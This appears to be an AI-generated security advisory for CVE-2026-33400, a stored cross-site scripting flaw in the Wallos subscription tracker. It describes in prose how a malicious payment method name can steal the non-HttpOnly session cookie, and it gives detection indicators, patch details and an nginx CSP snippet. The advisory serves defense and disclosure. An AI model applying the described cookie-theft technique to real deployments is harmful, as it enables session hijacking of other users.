CVE-2026-33400 Overview
CVE-2026-33400 is a stored cross-site scripting (XSS) vulnerability affecting Wallos, an open-source, self-hostable personal subscription tracker application. The vulnerability exists in the payment method rename endpoint, allowing any authenticated user to inject arbitrary JavaScript code that executes when any user visits the Settings, Subscriptions, or Statistics pages. This vulnerability is particularly dangerous because the wallos_login authentication cookie lacks the HttpOnly flag, enabling attackers to perform full session hijacking through malicious JavaScript payloads.
Critical Impact
Authenticated attackers can steal session cookies and hijack user accounts due to the combination of stored XSS and missing HttpOnly flag on authentication cookies.
Affected Products
- Wallosapp Wallos versions prior to 4.7.0
Discovery Timeline
- 2026-03-24 - CVE CVE-2026-33400 published to NVD
- 2026-03-26 - Last updated in NVD database
Technical Details for CVE-2026-33400
Vulnerability Analysis
This stored XSS vulnerability occurs in the payment method rename functionality of Wallos. When a user renames a payment method, the application fails to properly sanitize or encode user-supplied input before storing it in the database and subsequently rendering it in the user interface. This allows an authenticated attacker to embed malicious JavaScript code within a payment method name that will execute in the browser context of any user who views pages where payment methods are displayed—specifically the Settings, Subscriptions, and Statistics pages.
The severity of this vulnerability is compounded by a secondary security weakness: the wallos_login authentication cookie is not configured with the HttpOnly flag. This oversight allows JavaScript code to access the cookie via document.cookie, enabling attackers to exfiltrate session tokens and perform complete account takeovers.
Root Cause
The root cause of this vulnerability is improper input validation and output encoding (CWE-79) in the payment method rename endpoint. The application accepts user input for payment method names without adequate sanitization and fails to apply proper HTML entity encoding when rendering these values in the browser. Additionally, the absence of the HttpOnly flag on the authentication cookie represents a defense-in-depth failure that escalates the impact of any XSS vulnerability.
Attack Vector
The attack is network-based and requires low-complexity execution. An attacker must have authenticated access to the Wallos application, which represents a low privilege requirement. The attacker simply navigates to the payment method settings, edits a payment method name, and injects a malicious JavaScript payload as the new name. When any other user (including administrators) views any page that displays payment methods, the JavaScript executes in their browser context. The attacker's script can then access the wallos_login cookie and transmit it to an attacker-controlled server, enabling session hijacking.
Since user interaction is required (the victim must visit an affected page), this vulnerability enables session hijacking and potential account compromise of any user who views the affected pages after the malicious payload is injected. See the GitHub Security Advisory for complete technical details.
Detection Methods for CVE-2026-33400
Indicators of Compromise
- Unusual or suspicious characters in payment method names, particularly script tags, event handlers (e.g., onerror, onclick), or encoded JavaScript
- Network requests from client browsers to unexpected external domains that may indicate cookie exfiltration
- Audit logs showing payment method rename operations with suspicious payload strings
Detection Strategies
- Implement web application firewall (WAF) rules to detect XSS payloads in HTTP request bodies targeting the payment method rename endpoint
- Monitor application logs for payment method modifications containing HTML/JavaScript syntax patterns
- Use browser-based Content Security Policy (CSP) violation reporting to detect inline script execution attempts
Monitoring Recommendations
- Enable detailed logging for all payment method modification operations and review for anomalous content
- Configure alerts for authentication cookies being transmitted to external domains
- Deploy runtime application self-protection (RASP) solutions to detect and block XSS payload execution
How to Mitigate CVE-2026-33400
Immediate Actions Required
- Upgrade Wallos to version 4.7.0 or later immediately
- Audit all existing payment method names for potentially malicious payloads and sanitize or remove suspicious entries
- Force re-authentication for all users to invalidate potentially compromised session tokens
- Review access logs for indicators of prior exploitation
Patch Information
This vulnerability has been patched in Wallos version 4.7.0. The fix is available in commit e87387f0ebb540cd33e6dfda7181db9db650ecef. Users should update to the latest version immediately. For detailed information about the security patch, see the GitHub Commit Changes and the GitHub Security Advisory.
Workarounds
- If immediate patching is not possible, restrict access to the Wallos application to trusted users only
- Implement a reverse proxy or WAF with XSS filtering capabilities in front of the application
- Manually audit and sanitize all existing payment method names to remove any potentially malicious content
# Configuration example - Add CSP headers via reverse proxy (nginx)
# Add to your nginx server block to mitigate XSS impact
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none';" always;
add_header X-Content-Type-Options "nosniff" always;
add_header X-XSS-Protection "1; mode=block" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
